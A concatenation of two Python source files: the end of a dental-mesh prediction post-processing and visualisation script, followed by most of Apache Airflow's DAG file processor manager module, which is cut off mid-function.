save_model_part(save_path, predict_vs, predict_faces, predict_face_labels, "predict1.obj", "predict2.obj")
    # ------ process the predicted model ------
    # # Option 1: derive the points directly from the edge labels
    # predict_pts_labels = label_pts_by_edges(predict_vs, predict_edges, predict_labels)
    # predict_gum_pt_ids = np.where((predict_pts_labels[:,0]==0) & (predict_pts_labels[:,1]==1))[0]
    # predict_gum_pts = predict_vs[predict_gum_pt_ids]
    # print("predict_gum_pts: ", len(predict_gum_pts))
    # save_pts_to_vtk(predict_gum_pts, os.path.join(save_path, "predict.vtk"))
    # ## Option 2: decide using the face labels
predict_gum_pts = label_pts_by_edges_and_faces(predict_vs, predict_edges, predict_faces, predict_face_labels)
# print("predict_gum_pts: ", len(predict_gum_pts))
np.savetxt(os.path.join(save_path, "predict.pts"), predict_gum_pts)
save_pts_to_vtk(predict_gum_pts, os.path.join(save_path, "predict.vtk"))
# ## III. Batch processing
# In[15]:
def show_predict_batch(predict_model_list, predict_path):
"""
批量处理预测模型
@predict_model_list: 预测的模型列表
@predict_path: 预测模型存放路径
return: None
"""
for i, predict_model in enumerate(tqdm(predict_model_list)):
try:
save_predict(predict_model, predict_path)
except KeyError:
print("predict_model: ", predict_model)
except Exception as e:
raise e
# In[16]:
def parallel_show_predict(model_list, predict_path, n_workers=8):
"""
多进程处理
"""
if len(model_list) < n_workers:
n_workers = len(model_list)
chunk_len = len(model_list) // n_workers
chunk_lists = [model_list[i:i+chunk_len] for i in range(0, (n_workers-1)*chunk_len, chunk_len)]
chunk_lists.append(model_list[(n_workers - 1)*chunk_len:])
process_list = [Process(target=show_predict_batch, args=(chunk_list, predict_path, )) for chunk_list in chunk_lists]
for process in process_list:
process.start()
for process in process_list:
process.join()
# In[17]:
def show_predict(predict1, predict2, pts, max_dist_pts=None):
"""
显示预测结果
@predict1: 牙齿部分
@predict2: 牙龈部分
@pts: 牙龈线点
return: None
"""
    a = load(predict1).c('blue')
    b = load(predict2).c('magenta')
    c = load(pts).pointSize(10).c('green')
if max_dist_pts:
p1 = Point(max_dist_pts, r=20, c='yellow')
show(a, b, c, p1)
else:
show(a, b, c)
if __name__ == "__main__":
predict_dir = "/home/heygears/work/predict_results"
    # parse the results
predict_model_list = glob.glob(os.path.join(predict_dir, "*.obj"))
parallel_show_predict(predict_model_list, predict_dir, n_workers=8)
    # display the results
file_list = [os.path.join(predict_dir, file_path) for file_path in os.listdir(predict_dir)
if os.path.isdir(os.path.join(predict_dir, file_path))]
for i, file in enumerate(file_list):
print("{} file path is: {}".format(i + 1, file))
predict1_path = os.path.join(file, "predict1.obj")
predict2_path = os.path.join(file, "predict2.obj")
predict_pts = os.path.join(file, "predict.vtk")
show_predict(predict1_path, predict2_path, predict_pts)
    # ----- key controls --------
# length = len(file_list)
# i = 0
# while True:
# file = file_list[i]
# print("\n第{}个 file path is: {}".format(i + 1, file))
# predict1_path = os.path.join(file, "predict1.obj")
# predict2_path = os.path.join(file, "predict2.obj")
# predict_pts = os.path.join(file, "predict.vtk")
# show_predict(predict1_path, predict2_path, predict_pts)
#
# print("*****A(a):上一张; D(d):下一张; Q(q):退出; 按完键后回车表示确定!!!")
# line = sys.stdin.readline()
# if line == "a\n" or line == "A\n":
# if i > 0:
# i -= 1
# else:
# print("已经到最前面一张了,请按D(d)到下一张,按Q(q)退出")
# i = 0
# if line == "d\n" or line == "D\n":
# if i < length - 1:
# i += 1
# else:
# print("已经到最后面一张了,请按A(a)到下一张,按Q(q)退出")
# i = length - 1
# if line == "q\n" or line == "Q\n":
# break
|
manager.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Processes DAGs."""
import enum
import importlib
import inspect
import logging
import multiprocessing
import os
import random
import signal
import sys
import time
import zipfile
from collections import defaultdict
from datetime import datetime, timedelta
from importlib import import_module
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import TYPE_CHECKING, Any, Dict, List, NamedTuple, Optional, Union, cast
from setproctitle import setproctitle
from sqlalchemy.orm import Session
from tabulate import tabulate
import airflow.models
from airflow.callbacks.callback_requests import CallbackRequest
from airflow.configuration import conf
from airflow.dag_processing.processor import DagFileProcessorProcess
from airflow.models import DagModel, DbCallbackRequest, errors
from airflow.models.serialized_dag import SerializedDagModel
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.file import list_py_file_paths, might_contain_dag
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.net import get_hostname
from airflow.utils.process_utils import kill_child_processes_by_pids, reap_process_group
from airflow.utils.session import NEW_SESSION, provide_session
from airflow.utils.sqlalchemy import prohibit_commit, skip_locked, with_row_locks
if TYPE_CHECKING:
import pathlib
class DagParsingStat(NamedTuple):
"""Information on processing progress"""
done: bool
all_files_processed: bool
class DagFileStat(NamedTuple):
"""Information about single processing of one file"""
num_dags: int
import_errors: int
last_finish_time: Optional[datetime]
last_duration: Optional[float]
run_count: int
class DagParsingSignal(enum.Enum):
"""All signals sent to parser."""
AGENT_RUN_ONCE = 'agent_run_once'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin, MultiprocessingStartMethodMixin):
"""
Agent for DAG file processing. It is responsible for all DAG parsing
related jobs in scheduler process. Mainly it can spin up DagFileProcessorManager
in a subprocess, collect DAG parsing results from it and communicate
signal/DAG parsing stat with it.
This class runs in the main `airflow scheduler` process.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:param processor_timeout: How long to wait before timing out a DAG file processor
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:param pickle_dags: whether to pickle DAGs.
:param async_mode: Whether to start agent in async mode
"""
def __init__(
self,
dag_directory: str,
max_runs: int,
processor_timeout: timedelta,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
):
super().__init__()
self._file_path_queue: List[str] = []
self._dag_directory: str = dag_directory
self._max_runs = max_runs
self._processor_timeout = processor_timeout
self._dag_ids = dag_ids
self._pickle_dags = pickle_dags
self._async_mode = async_mode
# Map from file path to the processor
self._processors: Dict[str, DagFileProcessorProcess] = {}
# Pipe for communicating signals
self._process: Optional[multiprocessing.process.BaseProcess] = None
self._done: bool = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn: Optional[MultiprocessingConnection] = None
self._last_parsing_stat_received_at: float = time.monotonic()
def start(self) -> None:
"""Launch DagFileProcessorManager processor and start DAG parsing loop in manager."""
mp_start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(mp_start_method)
self._last_parsing_stat_received_at = time.monotonic()
self._parent_signal_conn, child_signal_conn = context.Pipe()
process = context.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._max_runs,
self._processor_timeout,
child_signal_conn,
self._dag_ids,
self._pickle_dags,
self._async_mode,
),
)
self._process = process
process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", process.pid)
def run_single_parsing_loop(self) -> None:
"""
Should only be used when launched DAG file processor manager in sync mode.
Send agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._parent_signal_conn or not self._process:
raise ValueError("Process not started.")
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_RUN_ONCE)
except ConnectionError:
            # If this died because of an error, we will notice and restart it
            # when harvest_serialized_dags calls _heartbeat_manager.
pass
def get_callbacks_pipe(self) -> MultiprocessingConnection:
"""Returns the pipe for sending Callbacks to DagProcessorManager."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
return self._parent_signal_conn
def wait_until_finished(self) -> None:
"""Waits until DAG parsing is finished."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._async_mode:
raise RuntimeError("wait_until_finished should only be called in sync_mode")
while self._parent_signal_conn.poll(timeout=None):
try:
result = self._parent_signal_conn.recv()
except EOFError:
return
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode (which is the only time we call this function) we don't send this message from
# the Manager until all the running processors have finished
return
@staticmethod
def _run_processor_manager(
dag_directory: str,
max_runs: int,
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
) -> None:
# Make this process start as a new process group - that makes it easy
# to kill all sub-process of this at the OS-level, rather than having
# to iterate the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collision with parent process.
# Because this process may need custom configurations that cannot be shared,
# e.g. RotatingFileHandler. And it can cause connection corruption if we
# do not recreate the SQLA connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__LOGGING__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
# TODO: This reloading should be removed when we fix our logging behaviour
# In case of "spawn" method of starting processes for multiprocessing, reinitializing of the
# SQLAlchemy engine causes extremely unexpected behaviour of messing with objects already loaded
# in a parent process (likely via resources shared in memory by the ORM libraries).
# This caused flaky tests in our CI for many months and has been discovered while
# iterating on https://github.com/apache/airflow/pull/19860
# The issue that describes the problem and possible remediation is
# at https://github.com/apache/airflow/issues/19934
importlib.reload(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0])) # type: ignore
importlib.reload(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(
dag_directory=dag_directory,
max_runs=max_runs,
processor_timeout=processor_timeout,
dag_ids=dag_ids,
pickle_dags=pickle_dags,
signal_conn=signal_conn,
async_mode=async_mode,
)
processor_manager.start()
def heartbeat(self) -> None:
"""Check if the DagFileProcessorManager process is alive, and process any pending messages"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll(timeout=0.01):
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
raise RuntimeError(f"Unexpected message received of type {type(message).__name__}")
def _heartbeat_manager(self):
"""Heartbeat DAG file processor and restart it if we are not done."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid,
self._process.exitcode,
)
self.start()
if self.done:
return
parsing_stat_age = time.monotonic() - self._last_parsing_stat_received_at
if parsing_stat_age > self._processor_timeout.total_seconds():
Stats.incr('dag_processing.manager_stalls')
self.log.error(
"DagFileProcessorManager (PID=%d) last sent a heartbeat %.2f seconds ago! Restarting it",
self._process.pid,
parsing_stat_age,
)
reap_process_group(self._process.pid, logger=self.log)
self.start()
def _sync_metadata(self, stat):
"""Sync metadata from stat queue and only keep the latest stat."""
self._done = stat.done
self._all_files_processed = stat.all_files_processed
self._last_parsing_stat_received_at = time.monotonic()
@property
def done(self) -> bool:
"""Has DagFileProcessorManager ended?"""
return self._done
@property
def all_files_processed(self):
"""Have all files been processed at least once?"""
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
# Give the Manager some time to cleanly shut down, but not too long, as
# it's better to finish sooner than wait for (non-critical) work to
# finish
self._process.join(timeout=1.0)
reap_process_group(self._process.pid, logger=self.log)
self._parent_signal_conn.close()
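# Hedged usage sketch (not part of this module): how a scheduler-like caller might drive
# the agent in async mode. The directory and timeout values below are placeholders.
#
#   from datetime import timedelta
#
#   agent = DagFileProcessorAgent(
#       dag_directory="/files/dags",
#       max_runs=-1,
#       processor_timeout=timedelta(seconds=600),
#       dag_ids=None,
#       pickle_dags=False,
#       async_mode=True,
#   )
#   agent.start()
#   while not agent.done:
#       agent.heartbeat()
#       time.sleep(1)
#   agent.end()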
class DagFileProcessorManager(LoggingMixin):
"""
Given a list of DAG definition files, this kicks off several processors
in parallel to process them and put the results to a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:param processor_timeout: How long to wait before timing out a DAG file processor
:param signal_conn: connection to communicate signal with processor agent.
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:param pickle_dags: whether to pickle DAGs.
:param async_mode: whether to start the manager in async mode
"""
def __init__(
self,
dag_directory: Union[str, "pathlib.Path"],
max_runs: int,
processor_timeout: timedelta,
dag_ids: Optional[List[str]],
pickle_dags: bool,
signal_conn: Optional[MultiprocessingConnection] = None,
async_mode: bool = True,
):
super().__init__()
self._file_paths: List[str] = []
self._file_path_queue: List[str] = []
self._dag_directory = dag_directory
self._max_runs = max_runs
# signal_conn is None for dag_processor_standalone mode.
self._direct_scheduler_conn = signal_conn
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._async_mode = async_mode
self._parsing_start_time: Optional[int] = None
        # Set the signal conn to non-blocking mode, so that attempting to
        # send when the buffer is full raises an error rather than hanging
        # forever (this is to avoid deadlocks!)
#
# Don't do this in sync_mode, as we _need_ the DagParsingStat sent to
# continue the scheduler
if self._async_mode and self._direct_scheduler_conn is not None:
os.set_blocking(self._direct_scheduler_conn.fileno(), False)
self._parallelism = conf.getint('scheduler', 'parsing_processes')
if (
conf.get_mandatory_value('database', 'sql_alchemy_conn').startswith('sqlite')
and self._parallelism > 1
):
self.log.warning(
"Because we cannot use more than 1 thread (parsing_processes = "
"%d) when using sqlite. So we set parallelism to 1.",
self._parallelism,
)
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler', 'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler', 'print_stats_interval')
# Map from file path to the processor
self._processors: Dict[str, DagFileProcessorProcess] = {}
self._num_run = 0
# Map from file path to stats about the file
self._file_stats: Dict[str, DagFileStat] = {}
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.make_aware(datetime.fromtimestamp(0))
# Last time stats were printed
self.last_stat_print_time = 0
# Last time we cleaned up DAGs which are no longer in files
self.last_deactivate_stale_dags_time = timezone.make_aware(datetime.fromtimestamp(0))
# How often to check for DAGs which are no longer in files
self.deactivate_stale_dags_interval = conf.getint('scheduler', 'deactivate_stale_dags_interval')
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler', 'dag_dir_list_interval')
# Mapping file name and callbacks requests
self._callback_to_execute: Dict[str, List[CallbackRequest]] = defaultdict(list)
self._log = logging.getLogger('airflow.processor_manager')
self.waitables: Dict[Any, Union[MultiprocessingConnection, DagFileProcessorProcess]] = (
{
self._direct_scheduler_conn: self._direct_scheduler_conn,
}
if self._direct_scheduler_conn is not None
else {}
)
def register_exit_signals(self):
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
# So that we ignore the debug dump signal, making it easier to send
signal.signal(signal.SIGUSR2, signal.SIG_IGN)
def _exit_gracefully(self, signum, frame):
"""Helper method to clean up DAG file processors to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.log.debug("Current Stacktrace is: %s", '\n'.join(map(str, inspect.stack())))
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.register_exit_signals()
# Start a new process group
os.setpgid(0, 0)
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
return self._run_parsing_loop()
@provide_session
def _deactivate_stale_dags(self, session=None):
"""
Detects DAGs which are no longer present in files
Deactivate them and remove them in the serialized_dag table
"""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_deactivate_stale_dags_time).total_seconds()
if elapsed_time_since_refresh > self.deactivate_stale_dags_interval:
last_parsed = {
fp: self.get_last_finish_time(fp) for fp in self.file_paths if self.get_last_finish_time(fp)
}
to_deactivate = set()
dags_parsed = (
session.query(DagModel.dag_id, DagModel.fileloc, DagModel.last_parsed_time)
.filter(DagModel.is_active)
.all()
)
for dag in dags_parsed:
# The largest valid difference between a DagFileStat's last_finished_time and a DAG's
# last_parsed_time is _processor_timeout. Longer than that indicates that the DAG is
# no longer present in the file.
if (
dag.fileloc in last_parsed
and (dag.last_parsed_time + self._processor_timeout) < last_parsed[dag.fileloc]
):
self.log.info(f"DAG {dag.dag_id} is missing and will be deactivated.")
to_deactivate.add(dag.dag_id)
if to_deactivate:
deactivated = (
session.query(DagModel)
.filter(DagModel.dag_id.in_(to_deactivate))
.update({DagModel.is_active: False}, synchronize_session="fetch")
)
if deactivated:
self.log.info("Deactivated %i DAGs which are no longer present in file.", deactivated)
for dag_id in to_deactivate:
SerializedDagModel.remove_dag(dag_id)
self.log.info("Deleted DAG %s in serialized_dag table", dag_id)
self.last_deactivate_stale_dags_time = timezone.utcnow()
def _run_parsing_loop(self):
# In sync mode we want timeout=None -- wait forever until a message is received
if self._async_mode:
poll_time = 0.0
else:
poll_time = None
self._refresh_dag_dir()
self.prepare_file_path_queue()
max_callbacks_per_loop = conf.getint("scheduler", "max_callbacks_per_loop")
standalone_dag_processor = conf.getboolean("scheduler", "standalone_dag_processor")
if self._async_mode:
# If we're in async mode, we can start up straight away. If we're
# in sync mode we need to be told to start a "loop"
self.start_new_processes()
while True:
loop_start_time = time.monotonic()
ready = multiprocessing.connection.wait(self.waitables.keys(), timeout=poll_time)
if self._direct_scheduler_conn is not None and self._direct_scheduler_conn in ready:
agent_signal = self._direct_scheduler_conn.recv()
self.log.debug("Received %s signal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_RUN_ONCE:
# continue the loop to parse dags
pass
elif isinstance(agent_signal, CallbackRequest):
self._add_callback_to_queue(agent_signal)
else:
raise ValueError(f"Invalid message {type(agent_signal)}")
if not ready and not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
                # SQLite DB, which isn't a good practice).
                # This shouldn't happen, as in sync mode poll should block
                # forever. Let's be defensive about that.
self.log.warning(
"wait() unexpectedly returned nothing ready after infinite timeout (%r)!", poll_time
)
continue
for sentinel in ready:
if sentinel is self._direct_scheduler_conn:
continue
processor = self.waitables.get(sentinel)
if not processor:
continue
self._collect_results_from_processor(processor)
self.waitables.pop(sentinel)
self._processors.pop(processor.file_path)
if standalone_dag_processor:
self._fetch_callbacks(max_callbacks_per_loop)
self._deactivate_stale_dags()
self._refresh_dag_dir()
self._kill_timed_out_processors()
# Generate more file paths to process if we processed all the files
# already.
if not self._file_path_queue:
self.emit_metrics()
self.prepare_file_path_queue()
self.start_new_processes()
# Update number of loop iteration.
self._num_run += 1
if not self._async_mode:
self.log.debug("Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
self.collect_results()
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
try:
if self._direct_scheduler_conn:
self._direct_scheduler_conn.send(
DagParsingStat(
max_runs_reached,
all_files_processed,
)
)
except BlockingIOError:
# Try again next time around the loop!
# It is better to fail, than it is deadlock. This should
# "almost never happen" since the DagParsingStat object is
# small, and in async mode this stat is not actually _required_
# for normal operation (It only drives "max runs")
self.log.debug("BlockingIOError received trying to send DagParsingStat, ignoring")
if max_runs_reached:
self.log.info(
"Exiting dag parsing loop as all files have been processed %s times", self._max_runs
)
break
if self._async_mode:
loop_duration = time.monotonic() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
@provide_session
def _fetch_callbacks(self, max_callbacks: int, session: Session = NEW_SESSION):
"""Fetches callbacks from database and add them to the internal queue for execution."""
self.log.debug("Fetching callbacks from the database.")
with prohibit_commit(session) as guard:
query = (
session.query(DbCallbackRequest)
.order_by(DbCallbackRequest.priority_weight.asc())
.limit(max_callbacks)
)
callbacks = with_row_locks(
query, of=DbCallbackRequest, session=session, **skip_locked(session=session)
).all()
for callback in callbacks:
try:
self._add_callback_to_queue(callback.get_callback_request())
session.delete(callback)
except Exception as e:
self.log.warning("Error adding callback for execution: %s, %s", callback, e)
guard.commit()
def _add_callback_to_queue(self, request: CallbackRequest):
self._callback_to_execute[request.full_filepath].append(request)
# Callback has a higher priority over DAG Run scheduling
if request.full_filepath in self._file_path_queue:
# Remove file paths matching request.full_filepath from self._file_path_queue
# Since we are already going to use that filepath to run callback,
# there is no need to have same file path again in the queue
self._file_path_queue = [
file_path for file_path in self._file_path_queue if file_path != request.full_filepath
]
self._file_path_queue.insert(0, request.full_filepath)
def _refresh_dag_dir(self):
"""Refresh file paths from dag dir if we haven't done it for too long."""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors()
except Exception:
self.log.exception("Error removing old import errors")
# Check if file path is a zipfile and get the full path of the python file.
# Without this, SerializedDagModel.remove_deleted_files would delete zipped dags.
# Likewise DagCode.remove_deleted_code
dag_filelocs = []
for fileloc in self._file_paths:
if not fileloc.endswith(".py") and zipfile.is_zipfile(fileloc):
with zipfile.ZipFile(fileloc) as z:
dag_filelocs.extend(
[
os.path.join(fileloc, info.filename)
for info in z.infolist()
if might_contain_dag(info.filename, True, z)
]
)
else:
dag_filelocs.append(fileloc)
SerializedDagModel.remove_deleted_dags(dag_filelocs)
DagModel.deactivate_deleted_dags(self._file_paths)
from airflow.models.dagcode import DagCode
DagCode.remove_deleted_code(dag_filelocs)
def _print_stat(self):
"""Occasionally print out stats about how fast the files are getting processed"""
if 0 < self.print_stats_interval < time.monotonic() - self.last_stat_print_time:
if self._file_paths:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = time.monotonic()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(~errors.ImportError.filename.in_(self._file_paths))
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path", "PID", "Runtime", "# DAGs", "# Errors", "Last Runtime", "Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = (now - processor_start_time) if processor_start_time else None
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge(f'dag_processing.last_run.seconds_ago.{file_name}', seconds_ago)
rows.append((file_path, processor_pid, runtime, num_dags, num_errors, last_runtime, last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
        rows = sorted(rows, key=lambda x: x[5] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append(
(
file_path,
pid,
f"{runtime.total_seconds():.2f}s" if runtime else None,
num_dags,
num_errors,
f"{last_runtime:.2f}s" if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None,
)
)
log_str = (
"\n"
+ "=" * 80
+ "\n"
+ "DAG File Processing Stats\n\n"
+ tabulate(formatted_rows, headers=headers)
+ "\n"
+ "=" * 80
)
self.log.info(log_str)
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration if stat else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""Sleeps until all the processors are done."""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def _collect_results_from_processor(self, processor) -> None:
self.log.debug("Processor for %s finished", processor.file_path)
Stats.decr('dag_processing.processes')
last_finish_time = timezone.utcnow()
if processor.result is not None:
num_dags, count_import_errors = processor.result
else:
self.log.error(
"Processor for %s exited with return code %s.", processor.file_path, processor.exit_code
)
count_import_errors = -1
num_dags = 0
last_duration = (last_finish_time - processor.start_time).total_seconds()
stat = DagFileStat(
num_dags=num_dags,
import_errors=count_import_errors,
last_finish_time=last_finish_time,
last_duration=last_duration,
run_count=self.get_run_count(processor.file_path) + 1,
)
self._file_stats[processor.file_path] = stat
file_name = os.path.splitext(os.path.basename(processor.file_path))[0].replace(os.sep, '.')
Stats.timing(f'dag_processing.last_duration.{file_name}', last_duration)
def collect_results(self) -> None:
"""Collect the result from any finished DAG processors"""
ready = multiprocessing.connection.wait(
self.waitables.keys() - [self._direct_scheduler_conn], timeout=0
)
for sentinel in ready:
if sentinel is self._direct_scheduler_conn:
continue
processor = cast(DagFileProcessorProcess, self.waitables[sentinel])
self.waitables.pop(processor.waitable_handle)
self._processors.pop(processor.file_path)
self._collect_results_from_processor(processor)
self.log.debug("%s/%s DAG parsing processes running", len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing", len(self._file_path_queue))
@staticmethod
def _create_process(file_path, pickle_dags, dag_ids, callback_requests):
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
